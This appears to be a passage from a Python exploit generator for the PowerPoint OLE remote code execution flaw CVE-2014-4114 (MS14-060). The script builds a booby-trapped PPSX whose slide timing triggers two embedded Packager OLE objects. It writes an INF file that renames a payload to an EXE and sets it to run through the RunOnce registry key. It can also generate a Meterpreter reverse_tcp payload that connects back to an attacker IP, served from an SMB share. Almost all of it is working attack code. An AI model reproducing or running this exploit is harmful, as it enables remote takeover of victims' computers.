xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'
return xml
def build_xml_slide1():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn 
id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond 
delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
return xml
# build [Content_Types].xml
def build_xml_content_types():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" 
ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
return xml
# build remotely hosted inf file
def build_inf(gif):
exe = gif.split('.')[0] + '.exe'
inf = '[Version]\n'
inf = inf + 'Signature = "$CHICAGO$"\n'
inf = inf + 'Class=61883\n'
inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
inf = inf + 'Provider=%Microsoft%\n'
inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
inf = inf + '[DestinationDirs]\n'
inf = inf + 'DefaultDestDir = 1\n'
inf = inf + '[DefaultInstall]\n'
inf = inf + 'RenFiles = RxRename\n'
inf = inf + 'AddReg = RxStart\n'
inf = inf + '[RxRename]\n'
inf = inf + exe + ', ' + gif + '\n'
inf = inf + '[RxStart]\n'
inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
return inf
# build blank pptx file with python-pptx
def build_presentation(filename):
prs = Presentation()
slide_layout = prs.slide_layouts[6] # blank slide
slide = prs.slides.add_slide(slide_layout)
prs.save(filename)
return
# build metasploit meterpreter reverse_tcp payload
def build_msfpayload(ip, port, file):
cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
run_cmd= subprocess.check_output(cmd, shell=True)
subprocess.call(run_cmd, shell=True)
print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
#################################################
############### Main ###############
#################################################
def main():
print
print '============================================================================='
print '| PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114) |'
print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
print '=============================================================================\n'
args = get_args() # get the cl args
ip = args.ip
share = "share"
ole1 = "oleObject1.bin"
ole2 = "oleObject2.bin"
vml = "vmlDrawing1.vml"
pptx = "tmp.pptx"
gif = "slide1.gif"
inf = "slides.inf"
# build meterpreter reverse tcp gif file (optional)
if args.msf:
print "[i] Building metasploit reverse_tcp executable"
build_msfpayload(args.ip, args.msf, gif)
# build the bin, inf and vml files
gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
draw_vml = build_vml()
rem_inf = build_inf(gif)
write_file(inf, rem_inf)
print ("[*] INF file [%s] created " % inf)
# build the xml files
xml_rel = build_xml_rels(ole1, ole2)
xml_slide1 = build_xml_slide1()
xml_content = build_xml_content_types()
# build blank temp pptx presentation to convert to ppsx
build_presentation(pptx)
zippptx = pptx + ".zip"
os.rename(pptx, zippptx) # rename to zip for modification
# open temp pptx and a copy for modification
zin = zipfile.ZipFile(zippptx, 'r')
zippptx_copy = "copy_" + zippptx
zout = zipfile.ZipFile(zippptx_copy, "w")
# modify the pptx template with exploit
for item in zin.infolist():
if (item.filename == "ppt/slides/slide1.xml"):
zout.writestr(item, xml_slide1) # replace slide 1 contents
elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
zout.writestr(item, xml_rel) # replace slide 1 rels
elif (item.filename == "[Content_Types].xml"):
zout.writestr(item, xml_content) # replace content_types
else:
buffer = zin.read(item.filename)
zout.writestr(item,buffer) # use existing file
zout.writestr("ppt/embeddings/" + ole1, gif_bin)
zout.writestr("ppt/embeddings/"+ole2, inf_bin)
zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
zout.close()
zin.close()
# convert to ppsx
os.rename(zippptx_copy, args.filename)
os.remove(zippptx)
print ("[*] Exploit PPSX file [%s] created" % (args.filename))
print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))
print
if __name__ == '__main__':
main()